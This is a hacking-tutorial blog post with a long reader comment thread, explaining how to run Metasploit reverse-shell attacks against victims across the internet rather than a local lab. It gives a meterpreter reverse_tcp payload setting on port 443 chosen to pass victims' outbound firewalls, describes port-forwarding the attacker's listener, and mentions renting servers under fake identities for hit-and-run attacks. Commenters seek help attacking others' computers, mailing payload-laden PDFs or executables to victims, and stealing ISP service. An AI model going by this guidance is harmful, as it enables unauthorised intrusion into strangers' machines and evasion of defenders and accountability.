How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic


Type : Tutorial

Level : Medium, Advanced

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network ๐Ÿ™‚ .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)

2. Dedicated Server

3. Cloud Server(I haven't try this ๐Ÿ™‚ ) e.g : Amazon

4. Internet With Public IP

5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) ๐Ÿ™‚

2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

3. Cloud server –> I haven't trying this…maybe someone can share ๐Ÿ™‚

4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Hacking WAN not LAN

Information(Attacker) :

– Attacker1 use local IP address –>

– Attacker1 have public IP address –>

– Attacker1 can control his router to redirect any incoming/outgoing traffic.

– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

Information(Victim) :

– Victim1 have local IP address –>

– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection

– Victim2 connected directly to internet with IP address –>

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, usually attacker can create some payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost

set lport 443

When the attack successfully launch, the payload will try to connect to IP address with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address

You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding ๐Ÿ™‚

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)

Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise ๐Ÿ™‚

Hope you found it useful.

If information I wrote here was wrong, let me know I'll correct it ๐Ÿ™‚

Get the latest hacking tutorial by subscribe to this website :

Subscribe Hacking Tutorial

(Visited 34,208 times, 42 visits today)

Share this article if you found this post was useful:

Blogger at Love PHP, offensive security and web. Contact him at me[-at-]

See all posts by || Visit Website :

  • Pingback: Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • There is a related and interesting blog post on the Netresec blog about how the meterpreter reverse_https backdoors can be detected.

  • Xt

    A demo video of this would be helpful. 

    • v4L

      sorry for that, but you can do it yourself when you have the requirement I describe above

  • w0lF 3ยฅe

    V4L i lik ur tuts… ๐Ÿ™‚
    I,ve a problem! My ISP provides a dynamic Wan ip so….i created account in no-ip and creatd a host…& installed DUC their free client program…then i portforwd my router to my Lan ip…..DO I HAVE TO PROVIDE THE NO- IP HOSTNAME IN LHOST IN METASPLOIT PAYLOAD SETTING…PLS XPLAIN HOW TO USE NO-IP HOST NAME INORDER TO PROPERLY GET MY METERPRETER REVERSE CONNECTION!!! PLS HELP V4L!

  • Nice info master, mantap. ๐Ÿ™‚

  • Hitch4000

    nice tutorial!
    I was just wondering, if you don't have a static IP. Couldn't you just use no-ip( to create a hostname to point to your dynamic IP?

    And then set localhost like this: set lhost <yourhostname>
    Bind the payload to an PDF file, and mail it to a victim

    Do you think this is posible?  


    • v4L

      Yep it’s possible ๐Ÿ™‚
      I’ve already wrote it here and here

  • Pingback: 4 Langkah Hacking Kedalam Jcow Social Networking Web Server « Exohacker()

  • Bro How To Setup VPN ? :@

    • v4L

      Maybe 1st you can see the explanation about VPN here, because VPN and VPS is something totally different.
      If you ask about VPN, you can use program like TOR, HotSpot Shield, OpenVPN, etc…
      but if you ask about VPS, you can ask further to your hosting provider about how to set it up(fyi:it’s not a free service you should pay monthly fee).

  • bRo Just Ek Bat BAtado Ke Port Forwarding Ke Liye Jo Apne tarika Diya He Isme Jo Ip he Wo Router Ki Ip He yA Host Ip He ?

  • Papgaur

    Do u have to use backtrack to hack a remote pc ? I only have metaspolit with armitage. can u use just this instead? will it work on windows 7???

    • v4L

      You also can use it in Windows, afaik there’s metasploit in Windows…but if you use Linux(I’m using Backtrack) it will be more simple and easier. I’m suggest using Backtrack because this distro already designed to do computer hacking / pentest.

  • Mohit

    hey  bro  how  to  OPEN  closed  port  m  using  USB  DONGLE  nd  my ISP has BLOCKED  ALL  when i pratice  ur attack  in  my  lab  i didn't get successfull due to closed  ports . 
    one more  thing  how to use  metasploit  to  hack  web server  . and web application  give me ny tutorial  

    • v4L

      usually an ISP server will not block all of your port, but they will filter it. If you use USB dongle, it just affect your PC, not a whole network.
      you need to find which port are open both victim & attacker (usually port 80, 443, etc)

  • sivaraaj

    Sir how to install VPS server….?

    • v4L

      you should buy it, then you can install it… ๐Ÿ™‚ the most easy way you can buy an internet packet from your provider with public ip address…

  • Pingback: Hacking Jcow Social Networking Webserver ยป Akiramitsu()

  • orsettobubu

    I managed to configure a DNS server so that the external client use my DNS server but when the client enters into facebook giousto dns not resolve the false one.
    How to use a dns sever CENTOS I miss something in the configuration of named.conf? I hope it can help

    • v4L

      hmm…yep I think maybe you miss something in your configuration…

  • subiyanto

    yup ok**banget untuk kami kaum yg tertidas**untuk pedidikan**

  • piyush

    hey im a big fan of your blog and hats off to your tutorials ๐Ÿ˜€
    ok let me get to the point
    i was trying to port forward my router so that i can use metasploit over the net but unfortunately it isnt working i dont know why
    here are the settings which i used:-
    in the port forwarding tab i have given my local ip address:192.168.1.x
    with the port no:443
    i have configured the network of my virtual machine to bridge 
    in back track i have configured it to use a static ip: 192.168.1.x(which i have configured in the router in the port forwarding tab)
    after doing all this and setting a credential harvester method i gave my ip to my friend(192.168.1.x)
    but nothing , he said it gave a 404 error 
    i dont know why ๐Ÿ™
    please help me out in doing port forwarding stuff if im doing it wrong

    • v4L

      if you give that ip 192.168.1.x to your friend, of course won’t’s local port…you should give your router address..
      on your router usually there’s forwarding port…so when someone open ip like : the router should redirect that request to your local ip address.

  • piyush

    thanx for your lightning fast comment bro… ๐Ÿ˜€
    i have done accordingly you said but when i use the java applet attack method it ask me if in using a NAT i type "yes" 
    then it says IP address of the set web server i type "my local IP"
    then it says is your payload handler on diffrent IP i type "no" 
    after all that it says failed to blind to 
    i dont know why ?
    please help 
    and im a NOOB please do elaborate 

    • v4L

      ip address of set web server should be your router, your router will forward every incoming packet that come to port 80 to your local IP.

  • joand

    HI .
    I read your tuts thats very cool really.. i need your help little )) how can i find other computers in my lan ..everytime i try nmap result is 1 host up(thats me) ..i want to try sslstrip but for that i dont find any computer for proceed ..i have beetel router ..i hope you can solve this issue ))

    • v4L

      did you have other clients connected with your local network?
      if yes and you still find nothing, then it’s because the firewall blocked your nmap request.
      if you ask to scan other ip outside your network, the answers is yes and no….
      yes if you can route your network to the network destination you want to scan
      no if you can’t do that

  • joand

    hi someone can tell to scan ip behind the router …becouse everytime i scan wd nmap result is 1 host i can get other host computer

  • rk

    I was waiting for the stuff for years… the way u explained is just Great

  • joand

    thank perfect answer ))))

  • jaond

    do need to telnet every WAN ip to execute MITM? even i have access to router login and password..can you please make a detail tutorial on MITM on WAN?  it is possible to telnet WAN ip ?

    • v4L

      btw usually MITM do inside a local network(but doesn’t mean it can’t do in public network)…
      yes you need to remote your server on the internet…but it’s better to learn on your local network..
      yes it’s possible if the server has a vulnerability.

  • joand

    Sir the problem is i do not have any other host computer in my lan network…and i want to know how can i find other host computer to execute any attack like MITM?

    • v4L

      if you already know the logic for this MITM, it will much easier for you to understanding further…
      if not, then my suggestion is : it’s better you try on your local network..if you don’t have other computer, then build a virtual machine and learn + try it first on your computer how to perform this.

  • joand

    i have virtual machine backtrack OS .and i do successfully mitm on my window xp….and got all the ssl logs… in Lan all successful execute
    as i say i have two ip ..lan is .192.168.1.x…and wan ip is 122.145.23.x like that..scan wan ip i got result many host ip live . …here is the question how can i redirect all outgoing and incoming traffic of these wan ip's through my host computer..
    please if possible  tell in detail thank you for your previous reply ๐Ÿ™‚

    • v4L

      If you can do that on your local network, then it remains the same for public…

  • joand

    if i knew how to do it i would not ask you LOL …

  • joand

    Give a man a fish …make me smile ))) it true indeed
    i know a guy who is also alone in his lan network but he is doing mitm successfully on other guys comp..just dnt know how he get these comps for attack ..and he dnt even want to tell me lol ))) i try my best to find way but smtimes got confuse and run in many directions ))

  • Baldassarre

    Hi v4L, 
    your tutorials are great.
    For this kind of attack, how can I find the victim's open ports? For example I have his public ip and then what I have to do? I've tried to forward a port and it succeded, it was really open that port, but I need to forward a port that the victim has open too! How can I find it? 
    I thank you for your time

    • v4L

      Actually if you saw the picture, you can scan victim 2 directly;
      but if it was victim 1, while you scan the ip, it’s not actual victim 1 ip address but it was the router(victim 1 was behind the router).
      btw if you read this tutorial, it wasn’t talk about scanning ip address or something you describe in your question. ๐Ÿ™‚

  • timetraveler

    Hi my friend, I have port forward my router and i made a nessus scan of a remote host. It’s vulnerable and i’m trying to exploit it. How do i set up my payload, should i set my open port or should i set the port of the vulnerable application (php)?

  • john D

    Hello.i want to ask if the hack is possible to made without the VPS or other host server just using our internal or external IP can be work?thanks a lot

    • v4L

      #john D
      you can view my other post here http://www./hacking-tutorial/how-to-hacking-wan-internet-by-using-public-dynamic-ip-address/

  • Avinash

    can we hack any internet service provider and can use internet free of cost with airtel,docomo,idea?

    • v4L

      oops i didn’t know about it…i also didn’t use their service ๐Ÿ™‚

  • Deepsa

    hi, i want to remote access xp cmd in lan via ip address through lhost and rhost method i’m using backtrack r1 …do not want to use any virus, pdf, link etc,etc…i just know victim local ip address …will u plz help me

    • v4L

      then the answer is NOT.
      only a vulnerable OS you can do like that.

  • sniffer

    thanks Bro

  • Bree

    Hi , I dont have access to the router administration (only my father have the pswd :p and won’t give it to me )I’m runing bt can I do NAPT just by using iptables in order to do this : : 443 = xx.xx.xx.xx : yyy
    xx.xx.xx.xx is my public ip and yyy the port that the payload will use .. help please :'(

    • v4L

      you need to have an access to your router

      • Bree

        ok thanks a lot ๐Ÿ™‚

  • Rahul

    can we hack a PC which is from another country or another state or city?
    let me clear it if i want to hack a pc and he has their own internet connection and i have a pc and i have my own internet connection. can i hack ? or for WAN hacking 1st we need to connect our backtrack with their internet(WAN) ?

    • v4L

      maybe you can use client hacking.

      • Rahul

        thanks for reply…. sorry didnt get client hacking any article on this ?

  • Boris


    • v4L


  • Ronit

    hello vishnu ….
    i need to know that how can i remotely control my cafes route from my home with a laptop via internet…

    • Sanusi Vihzor


  • jason

    This things was as easy as 123 for me before. That was when I still on a static IP and have a router. But I moved to a place where I can only connect to the cyberspace via 3G dongle that is behind an ISP NAT and have a Dynamic IP.
    Any advice on doing this using 3G dongle? I also don't have a router to port forward to my local ip. I tried No-IP but it didn't work.

    • v4L

      you must have a full control to your router to forward incoming packet to your local network.

  • zain

    u didnt told what ip address we have to set for victum wan ip or local ip coz if we set wan ip it will only connect with router not lan ips explain plz

    • v4L

      that’s why you need to forward the packet from router to your local network.
      if you use router box, find your manufacturer brand and find how to do port forwarding e.g:
      if your router is a pc(windows), see here http://www./hacking-tutorial/spi-port-forward-redirection-for-windows-to-another-port-ip-address/

      • c4

        port forward at attacker side or client side or both?

        • v4L


          attacker side

          • c4

            thank u sir for ur quick response

  • Jake Lancaster

    I was wondering when u say Attacker1 & Attacker2 those are just 2 different ways you can* attack correct you dont actually have to have 2 attackers?

    • v4L


      yes correct…you can choose one of them or if you have both also ok

  • victor

    Thanks for your tutorial …

    An ISP assigns dynamic IPs to its subscribers via WIFI or 3G dongle. the question is:

    Will the wan hack work in this scenario? I don’t think so, but if yes how port forwarding works?

    • v4L


      it’s depend how the ISP share their dynamic IP, whether they use public or private IP.

      if use private, port forwarding will not work except you can access their router. If public, yes you can directly connect to your machine.

      • victor

        Now it’s become very clear to me.

        Thanks, perfect answer! very appreciate.

        • nomad

          it’s certainly public but the ip will only change if you reconnect the router, if your router doesn’t reconnect by itself (like mine which is a pain in the ass) you’ll be fine

  • root

    when i port forwarding , and i scanned my ip with nmap to see if the port is open that show port filtered , that mean is working? or it isn’t?

    • v4L


      if your IP was behind NAT, maybe it’s your firewall IP and they filter it.

  • nomad

    a question, if i use RPORT 443 and another LPORT like… LPORT 666, will it work if i forward port 666 to my attacker machine ?

  • TheKingofdemon33

    How do i port forward iPhone hotspot internet? Please help.

  • hunter

    should i connect wire to wire with local lan to perform attack out of lan??

  • Frank

    I’ve read over this many times. I see how you attack victim 2. Of course. But victim 1 is behind the router so how do you direct a query to a LAN side up without being on the network? I know I can ping a router public ip (wan) but if I’m not on the network I can’t see anything on the other side.

    • Alex

      Well, how about hacking a router first, you may use some exploit for that (Loads of routers are exploitable now), connect to the router using telnet/ssh? the problem is to connect to the computers on that local network, but i am sure there is a solution just try to google it. I am sorry if my answer is not something you are wondering of. My language is not so good, so i might have wrongly understood the question ๐Ÿ™

    • XoRR

      both are behind a router (NAT) this is why attacker is using a reverse shell so victim will connect to you thats why attacker doing port forwarding, e.g you send and exe that you have injected with payload and tell it that “hey exe when you got clicked please connect back to this ip using usuallyopen ports like 80 8080 or 443” so it doesn’t matter if victim is in another network and you dont need to know or worry about victims ip or network, all you have to is to social engineer the victim to open that exe and BOOM!!

    • gouranga#!

      You can see everything by angry ip scanner

  • Mi

    Just a quick question and I hope the writer of this article still replies ๐Ÿ˜› , is there anyway to scan ip addresses/ MAC addresses connected on WAN as we do in LAN? I really need to know this, thanks for the article by the way.

  • vickki

    can u eplain in detaiil how to set up vpn/dedicated/cloud

  • vickki

    and can u make a tutorial for bash file scripting or bash scripting to bypass login for downloading free pdf or free e newspaper etc

  • XoRR

    can i put my VM into DMZ? if yes than plz tell me how?
    so if it could be added in DMZ than do i sitll need to forward ports and using NO-IP or just giving away my VM’s IP to targets to get a reverse meterpreter shell ?

  • optic

    i have a access point and many client (windows xp,7,8 and android phone) can To introduce tutorial for hacking this clients?

  • sk

    Hey! Nice article Vishnu
    I am using the Social Engineering Toolkit of Kali-Linux to create a payload and listener. I have a public ip address. What ip address should i use for RHOST? plz suggest. Also if i want to know LHOST then how do i get the ip address? Thanx in advance!

  • Mohammed Hanafy Ali

    but how to do the attack without luring target to click a link if i have no contact with target (a black box) … how to get to the remote machines behind that router??

  • yash

    is there a way to hack without any exe file, letting it be a difficult task, but is it possible?

  • mr x

    When hacking a remote pc over internet, will my ISP detect and also while entering the victim will his ISP(different from mine) detect?

  • sid

    how to hack outside lan while using tor or proxychain